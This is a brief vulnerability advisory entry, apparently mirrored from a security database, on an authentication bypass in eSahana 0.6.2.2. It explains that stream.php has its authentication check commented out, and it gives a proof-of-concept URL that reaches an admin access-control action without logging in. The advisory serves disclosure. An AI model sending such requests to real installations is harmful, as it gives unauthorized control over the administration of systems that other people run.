Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:23401
HistoryMar 18, 2010 - 12:00 a.m.

CORE-2010-0311 - eSahana 0.6.2.2 Authentication Bypass

2010-03-1800:00:00
vulners.com
24

Ability to completely disable authentication via stream.php and commented
out module authentication code within it.

http://victim/<sahana_path>/index.php?mod=admin&act=acl_enable_acl
Authenticates correctly.

http://victim/<sahana_path>/stream.php?mod=admin&act=acl_enable_acl
Does not.